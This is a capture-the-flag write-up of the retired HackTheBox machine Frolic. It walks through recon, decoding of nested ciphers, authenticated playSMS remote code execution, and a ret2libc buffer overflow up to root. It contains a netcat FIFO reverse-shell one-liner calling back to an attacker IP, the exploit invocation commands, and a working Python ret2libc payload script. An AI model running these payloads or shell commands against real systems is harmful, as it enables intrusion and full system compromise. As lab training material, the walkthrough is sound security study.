HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic

Recon

Let's start out with a threader3000 scan

Some interesting results here

Port 22 and 445 aren't uncommon… but 1880 and 9999 are..

Let's let nmap run through these ports 

Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middleware) |_http-title: Node-RED 9999/tcp open  http        nginx 1.10.3 (Ubuntu) |_http-server-header: nginx/1.10.3 (Ubuntu) |_http-title: Welcome to nginx! Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -1h39m34s, deviation: 3h10m31s, median: 10m25s |_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu) |   Computer name: frolic |   NetBIOS computer name: FROLIC\x00 |   Domain name: \x00 |   FQDN: frolic |_  System time: 2021-05-06T01:57:56+05:30 | smb-security-mode: |   account_used: guest |   authentication_level: user |   challenge_response: supported |_  message_signing: disabled (dangerous, but default) | smb2-security-mode: |   2.02: |_    Message signing enabled but not required | smb2-time: |   date: 2021-05-05T20:27:56 |_  start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.50 seconds

This looks like a ubuntu box but with samba? Weird

A listing shows some shares.

Strange.

Ok what about those other ports

1880 says it's http Node-red Node.js

9999 says it's nginx

Let's try to browse to them.

On port 1800 we see this

Node-Red

Ok

What about port 9999

Just the default nginx page

I ran auto-recon on this box vi ip address and it came back with a couple of directories on port 9999  one of which is /admin

Ok let's check out the source code.

What is that login.js?

Is that a hard coded user/pass?

Yup

Ok but it then redirects to this.

Looks like something encoded, maybe? This looks interesting….

So after some googling I figured out this is a representation of the ook programing language… Luckily the decode.fr has a decoder for it.

https://www.dcode.fr/ook-language

The decoding is..

Nothing here check /asdiSIAJJ0QWE9JAS

Ok let's check out that directory on port 9999

Another cipher

UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA

Throwing a bunch of stuff from cyber chef at it I noticed this in base64

Could this be the hex of a file?

I saved the hex output from cyberchef

Looked at it in a hex editor 

It starts with PK, which a quick google search leads us to 

It might be a .zip file

Ok let's rename it using mv

Yay it is a zip file that looks like it contains index.php…. But the thing is password protected.

Let's run it through fcrackzip

Password is password.

And honestly what do we expect here?

More encoding..

And cyber chef again from hex gives us what looks like base64 again.

KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==

Which of course gives us something else

Which is also some ancient programming language called brainfuck.

Decode.fr to the rescue again.

https://www.dcode.fr/brainfuck-language

idkwhatispass

Well at least it's not encoded anymore, I'm assuming this is the password for something.

It didn't work for the node-red thing…. Let's through dirb at the 2 ports we found with webservers to see if we can come up with another place to login.

Dirb found this directory

Which looks like it points to another directory /playsms

Which is asking for a login let's try admin and the decoded one we got

That worked

What is playsms?

Ok

A google for vulns shows this github for authenticated RCE.

https://github.com/jasperla/CVE-2017-9101

Let's give it a shot

Exploit

Looks like it works!

python3 ./POC.py --username admin --password idkwhatispass --url http://10.10.10.111:9999/playsms/ --command 'id'

Let's get a shell with this

Let's change it to interactive mode

python3 ./POC.py --username admin --password idkwhatispass --url http://10.10.10.111:9999/playsms/ -i

After some working with this I couldn't get a shell to stay open, it would die immediately after connecting  to get around this

I made a rs.sh file in /tmp/circusmonkey and used echo to fill it with my command

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 5555 >/tmp/f' > /tmp/circusmonkey/rs.sh

 and then used the 'interactive' POC to give that file execution rights and called it

And now we have a better shell to figure out or priv esc in.

Contents of user.txt and password.txt from /var/www/html/backup

Linpeas shows an interesting SUID binary

In /home/ayush/.binary/rop

It looks like it just dumps what ever is thrown at it to a message.

First let's take a look at the binary to see if any restrictions are in place

ASLR is not enabled on the box

What about the NX bit on the binary

checksec ./rop

Well that sucks there is no execution set for the stack, so we can't just drop shell code into the stack and get execution. We will have to use another method to get our shell.

File output shows it to be a 32-bit binary

Let's see if we can overflow it

./rop $(python -c 'print "A"*500')

We sure can… let's try to exploit it

https://niiconsulting.com/checkmate/2019/09/exploiting-buffer-overflow-using-return-to-libc/

Let's use nc to copy this file over to our kali box to see if we can craft an BOF exploit for it.

New listener on kali

nc -lnvp 5566 > rop

Send it from frolic

nc 10.10.14.20 5566 < ./rop

Let's load the file up in gdb

If you don't already have peda installed for gdb install it from here

https://github.com/longld/peda

Launch gdb

gdb

Set the file

file ./rop

Now we test just to make sure it runs like we think

Good, let's try to crash it again in gdb

gdb-peda$ r $(python2 -c "print 'A'*500")

Yup, let's find the offset

First let's use pattern create to make a pattern we can use to search for the offset using pattern_create

pattern_create 500 buffer

This creates a file named buffer with a unique string of 500 characters.

Then we just feed that file named buffer into the ./rop

r $(cat buffer)

And now we can use pattern_find to find the offset

I kept having problems here with this large of a pattern, I couldn't find the offset so I dropped it down to 100

pattern_create 100 buffer

Then pattern_offset search for "AAGA"

So our offset is 52

Let's try to send 52 A's followed by 4 B's to see if we overwrite the $eip with B's

r $(python2 -c "print 'A'*52 + 'B'*4")

Good that worked we can control the $eip

Ok now we need to figure out all the stuff we need to do a libc attack on this binary..

Start out by finding the version/location

ldd rop

Base b7e19000

Next we need to find the address for /bin/sh

15ba0b

Then we need to find system and exit

System

003ada0

Exit

0002e9d0

Ok we have what we need to exploit this thing.

Base 0xb7e19000

/bin/sh  0x0015ba0b

System 0x0003ada0

Exit 0x0002e9d0

Now we just need to build out a python script that will combine all these for us

import struct base = 0xb7e19000 binsh = 0x0015ba0b syst = 0x0003ada0 exit = 0x0002e9d0 syst_final = struct.pack("<I", base+syst) binsh_final = struct.pack("<I", base+binsh) binsh_final = struct.pack("<I", base+binsh) exit_final = struct.pack("<I", base+exit) buff = "A" * 52 buff += syst_final buff += exit_final buff += binsh_final print buff

Save all this to a python script I named frolic.py on frolic

Then run ./rop calling this script

./rop $(python /tmp/circusmonkey/frolic.py)

We are root

Now we can just grab our flag and submit it